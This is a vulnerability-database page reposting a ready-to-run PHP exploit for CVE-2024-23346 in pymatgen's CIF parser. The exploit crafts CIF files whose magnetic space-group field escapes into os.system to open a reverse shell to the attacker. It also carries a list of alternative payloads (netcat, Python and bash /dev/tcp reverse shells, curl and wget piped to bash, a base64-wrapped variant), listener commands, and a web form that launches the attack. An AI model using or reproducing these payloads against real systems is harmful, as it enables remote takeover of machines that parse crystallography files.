Vulners
Lucene search
📄 Pymatgen 2024.1 CIF Parser Reverse Shell
| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
 | Exploit for Command Injection in Materialsvirtuallab Pymatgen | 24 Jul 202518:12 | – | githubexploit |
| Exploit for Command Injection in Materialsvirtuallab Pymatgen | 9 Dec 202422:34 | – | githubexploit |
| Exploit for Command Injection in Materialsvirtuallab Pymatgen | 25 Feb 202514:52 | – | githubexploit |
| Exploit for Command Injection in Materialsvirtuallab Pymatgen | 20 Feb 202512:23 | – | githubexploit |
 | CVE-2024-23346 | 21 Feb 202415:45 | – | circl |
 | Pymatgen Security Vulnerability | 21 Feb 202400:00 | – | cnnvd |
 | CVE-2024-23346 | 21 Feb 202416:13 | – | cve |
 | CVE-2024-23346 pymatgen arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string | 21 Feb 202416:13 | – | cvelist |
 | [SECURITY] [DSA 5763-1] pymatgen security update | 30 Aug 202418:05 | – | debian |
 | CVE-2024-23346 | 21 Feb 202416:13 | – | debiancve |
10
=============================================================================================================================================
| # Title : Pymatgen 2024.1 CIF Parser Reverse Shell Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://pymatgen.org/ |
=============================================================================================================================================
[+] Summary :
Pymatgen version 2024.1 contains a critical remote code execution vulnerability in its Crystallographic Information File (CIF)
parser that allows attackers to execute arbitrary Python code through specially crafted CIF files, leading to complete system compromise.
The vulnerability exists in the CIF parser's handling of the _space_group_magn.transform_BNS_Pp_abc field,
which improperly evaluates Python code embedded in CIF files without proper sanitization, allowing arbitrary code execution during file parsing.
[+] POC :
php poc.php
<?php
class PymatgenRCEExploit {
private $ip;
private $port;
private $malicious_file = 'vuln.cif';
public function __construct($ip, $port) {
$this->ip = $ip;
$this->port = $port;
}
public function create_malicious_cif() {
$malicious_cif = <<<CIF
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {$this->ip} {$this->port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
CIF;
if (file_put_contents($this->malicious_file, $malicious_cif)) {
echo "[+] Malicious CIF file created: {$this->malicious_file}\n";
return true;
} else {
echo "[-] Failed to create malicious CIF file\n";
return false;
}
}
public function exploit() {
echo "[*] Starting Pymatgen RCE Exploit (CVE-2024-23346)\n";
echo "[*] Target: Pymatgen 2024.1\n";
echo "[*] Reverse Shell: {$this->ip}:{$this->port}\n";
if (!$this->create_malicious_cif()) {
return false;
}
if (!$this->check_dependencies()) {
return false;
}
echo "[*] Triggering the exploit by parsing malicious CIF file...\n";
$python_script = $this->generate_python_trigger();
$temp_python_file = 'trigger_exploit_' . bin2hex(random_bytes(4)) . '.py';
file_put_contents($temp_python_file, $python_script);
$output = shell_exec("python3 " . escapeshellarg($temp_python_file) . " 2>&1");
unlink($temp_python_file);
if (file_exists($this->malicious_file)) {
unlink($this->malicious_file);
}
echo "[*] Exploit triggered\n";
echo "[*] Check your listener for reverse shell connection\n";
if (!empty($output)) {
echo "[*] Python output: " . trim($output) . "\n";
}
return true;
}
private function check_dependencies() {
echo "[*] Checking dependencies...\n";
$python_check = shell_exec("which python3 2>/dev/null");
if (empty($python_check)) {
echo "[-] Python3 is not installed or not in PATH\n";
return false;
}
echo "[+] Python3 found: " . trim($python_check) . "\n";
$pymatgen_check = shell_exec("python3 -c 'import pymatgen; print(pymatgen.__version__)' 2>/dev/null");
if (empty($pymatgen_check)) {
echo "[-] Pymatgen is not installed\n";
echo "[*] Attempting to install pymatgen...\n";
$install_output = shell_exec("pip3 install pymatgen==2024.1 2>&1");
if (strpos($install_output, 'Successfully installed') === false) {
echo "[-] Failed to install pymatgen\n";
return false;
}
echo "[+] Pymatgen installed successfully\n";
} else {
echo "[+] Pymatgen found: version " . trim($pymatgen_check) . "\n";
if (version_compare(trim($pymatgen_check), '2024.1', '==')) {
echo "[+] Vulnerable version detected\n";
} else {
echo "[!] Different version detected: " . trim($pymatgen_check) . " - exploit may still work\n";
}
}
return true;
}
private function generate_python_trigger() {
return <<<PYTHON
import sys
import os
try:
from pymatgen.io.cif import CifParser
print("[*] Attempting to parse malicious CIF file...")
parser = CifParser("{$this->malicious_file}")
structure = parser.parse_structures()
print("[+] CIF file parsed successfully")
except Exception as e:
print(f"[-] Error during parsing: {{e}}")
sys.exit(1)
PYTHON;
}
public function generate_listener_commands() {
echo "\n[*] Setup listener using one of these commands:\n";
echo " nc -lvnp {$this->port}\n";
echo " ncat -lvnp {$this->port}\n";
echo " socat TCP-LISTEN:{$this->port},reuseaddr,fork EXEC:/bin/bash\n";
}
}
class PymatgenAlternativeExploits {
public static function generate_different_payload($ip, $port, $payload_type = 'reverse_shell') {
$payloads = [
'reverse_shell' => "nc {$ip} {$port} -e /bin/bash",
'python_reverse' => "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{$ip}\",{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
'bash_reverse' => "bash -i >& /dev/tcp/{$ip}/{$port} 0>&1",
'curl_download' => "curl http://{$ip}:8000/shell.sh | bash",
'wget_download' => "wget -q -O - http://{$ip}:8000/shell.sh | bash"
];
return $payloads[$payload_type] ?? $payloads['reverse_shell'];
}
public static function create_advanced_malicious_cif($ip, $port, $payload_type = 'reverse_shell') {
$payload = self::generate_different_payload($ip, $port, $payload_type);
$encoded_payload = base64_encode($payload);
$advanced_payload = "echo '{$encoded_payload}' | base64 -d | bash";
$malicious_cif = <<<CIF
data_CVE_2024_23346
_audit_creation_date 2024-11-13
_audit_creation_method "Research Purpose Only"
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__bases__[0].__subclasses__() if d.__name__ == "BuiltinImporter"][0].load_module("os").system("{$advanced_payload}");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
CIF;
return $malicious_cif;
}
}
class SimplePymatgenExploit {
public static function quick_exploit($ip, $port) {
$cif_content = self::generate_malicious_cif($ip, $port);
$filename = 'exploit_' . bin2hex(random_bytes(4)) . '.cif';
file_put_contents($filename, $cif_content);
$python_code = "
from pymatgen.io.cif import CifParser
try:
parser = CifParser('{$filename}')
structures = parser.parse_structures()
print('Exploit triggered successfully')
except Exception as e:
print(f'Error: {e}')
";
$temp_py = 'temp_exploit.py';
file_put_contents($temp_py, $python_code);
echo "[*] Executing exploit...\n";
system("python3 {$temp_py}");
unlink($filename);
unlink($temp_py);
}
private static function generate_malicious_cif($ip, $port) {
return <<<CIF
data_Exploit
_audit_creation_date 2024-11-13
_space_group_magn.transform_BNS_Pp_abc 'a,b,[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "BuiltinImporter"][0].load_module("os").system("nc {$ip} {$port} -e /bin/bash");0,0,0'
CIF;
}
}
if (php_sapi_name() === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) {
if ($argc < 3) {
echo "Pymatgen 2024.1 Remote Code Execution (CVE-2024-23346)\n";
echo "======================================================\n";
echo "Usage: php " . $argv[0] . " <LHOST> <LPORT>\n";
echo "Example: php " . $argv[0] . " 192.168.1.100 4444\n";
echo "\nAdditional options (environment variables):\n";
echo "PAYLOAD_TYPE=reverse_shell|python_reverse|bash_reverse\n";
echo "QUICK_MODE=true\n";
exit(1);
}
$lhost = $argv[1];
$lport = $argv[2];
$payload_type = getenv('PAYLOAD_TYPE') ?: 'reverse_shell';
$quick_mode = getenv('QUICK_MODE') === 'true';
try {
if ($quick_mode) {
echo "[*] Running in quick mode...\n";
SimplePymatgenExploit::quick_exploit($lhost, $lport);
} else {
$exploit = new PymatgenRCEExploit($lhost, $lport);
if ($exploit->exploit()) {
$exploit->generate_listener_commands();
}
}
echo "\n[*] Note: This exploit targets CVE-2024-23346 in Pymatgen 2024.1\n";
echo "[*] The vulnerability is in the CIF parser's handling of malicious input\n";
} catch (Exception $e) {
echo "[-] Exploit failed: " . $e->getMessage() . "\n";
exit(1);
}
}
if (isset($_GET['web']) && $_GET['web'] === 'true') {
header('Content-Type: text/html; charset=utf-8');
?>
<!DOCTYPE html>
<html>
<head>
<title>Pymatgen RCE Exploit (CVE-2024-23346)</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.container { max-width: 800px; margin: 0 auto; }
.form-group { margin: 15px 0; }
label { display: block; margin-bottom: 5px; }
input, select { padding: 8px; width: 200px; }
button { padding: 10px 20px; background: #007cba; color: white; border: none; cursor: pointer; }
.output { background: #f4f4f4; padding: 15px; margin: 15px 0; white-space: pre-wrap; }
</style>
</head>
<body>
<div class="container">
<h1>Pymatgen RCE Exploit (CVE-2024-23346)</h1>
<?php
if ($_POST['exploit'] ?? false) {
$ip = $_POST['ip'] ?? '';
$port = $_POST['port'] ?? '';
$payload_type = $_POST['payload_type'] ?? 'reverse_shell';
if (!empty($ip) && !empty($port)) {
echo "<div class='output'>";
try {
$exploit = new PymatgenRCEExploit($ip, $port);
$exploit->exploit();
$exploit->generate_listener_commands();
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
echo "</div>";
}
}
?>
<form method="post">
<input type="hidden" name="exploit" value="true">
<div class="form-group">
<label>Your IP Address:</label>
<input type="text" name="ip" value="<?= $_SERVER['REMOTE_ADDR'] ?? '' ?>" required>
</div>
<div class="form-group">
<label>Listener Port:</label>
<input type="number" name="port" value="4444" required>
</div>
<div class="form-group">
<label>Payload Type:</label>
<select name="payload_type">
<option value="reverse_shell">Netcat Reverse Shell</option>
<option value="python_reverse">Python Reverse Shell</option>
<option value="bash_reverse">Bash Reverse Shell</option>
</select>
</div>
<button type="submit">Execute Exploit</button>
</form>
<div style="margin-top: 30px; font-size: 0.9em; color: #666;">
<strong>Note:</strong> This exploit requires pymatgen 2024.1 to be installed on the target system.
The vulnerability allows remote code execution through malicious CIF file parsing.
</div>
</div>
</body>
</html>
<?php
exit;
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Feb 2026 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 3.17.8 - 9.3
EPSS0.54892
SSVC